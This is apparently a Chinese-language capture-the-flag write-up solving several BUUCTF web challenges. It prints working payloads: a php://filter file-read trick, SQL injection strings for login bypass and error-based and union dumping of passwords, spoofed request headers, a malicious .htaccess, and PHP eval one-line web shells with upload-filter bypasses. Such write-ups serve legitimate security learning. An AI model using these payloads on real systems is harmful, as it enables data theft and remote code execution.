[極客大挑戰 2019]Secret File
開啟題目檢視原始碼,找到了一個檔案
然後就是一個按鈕,點選後,他應該是反應了,但是我們看不到
那我們抓包看看,這裡是Burp抓包後,發到重發器傳送了一遍,看看響應包,發現了
然後訪問這個網頁就是一個原始碼
這裡沒有過濾php://filter
?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解密後得到flag
[極客大挑戰 2019]LoveSQL
先用萬能賬號密碼試試,成功登入
1'or true#
登陸進去沒啥用,可能藏在資料庫了,這次我們用報錯注入,因為我試了,他會有報錯語句
爆庫名
1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or '
爆表名
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='geek'),0x7e))or '
先爆這個love這個表裡面的列,畢竟他和題目一樣名字
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'),0x7e))or '
然後爆資料(我覺得我挺傻逼,我爆到第15行才有flag,純手搓)
1' and extractvalue(1,concat(0x7e,(select password from l0ve1ysq1 limit 15,1),0x7e))or '
然後我發現死活得不到後半段,只要一看16行就報錯,我也是不懂了,所以最後我就正常得到資料的
1' union select 1,2,group_concat(password) from l0ve1ysq1#
[極客大挑戰 2019]Http
開啟題目發現是賣鞋廠,我也是慌了,看看原始碼有沒有資訊吧
找到了,那我們就訪問一下
抓包開搞:
說我不是這裡來的
Referer:https://Sycsecret.buuoj.cn
又提示不是這個瀏覽器
User-Agent: Syclover
又提示不是本地訪問
X-Forwarded-For:127.0.0.1
總的請求頭就是這個:
拿下flag:
[極客大挑戰 2019]Knife
蟻劍直接連線
根目錄找到flag
[極客大挑戰 2019]Upload
這道題就是我發現可以上傳.htaccess檔案
所以這裡我就抓包上傳
<IfModule mime_module>
SetHandler application/x-httpd-php
</IfModule>
然後開始上傳圖片馬
這道題過濾了 <? 所以常規的一句話木馬我們是不能上傳的
<script language="php">@eval($_POST['cmd'])</script>
上傳成功後,沒有返回路徑,我們猜測在upload的資料夾下,訪問一下果然有
那我們就找到我們上傳的一句話木馬的檔案,開始試著蟻劍連線
發現不行,好像是.htaccess這個檔案不起作用
那我們用字尾名繞過 phtml
GIF89a
<script language="php">eval($_REQUEST['cmd'])</script>
然後用蟻劍連線
根目錄找到flag
[ACTF2020 新生賽]Upload
這道題就是MIME繞過就行,還有一些字尾名被過濾了
字尾名我們就用phtml,這個是可以被解析的
蟻劍連線,根目錄找到flag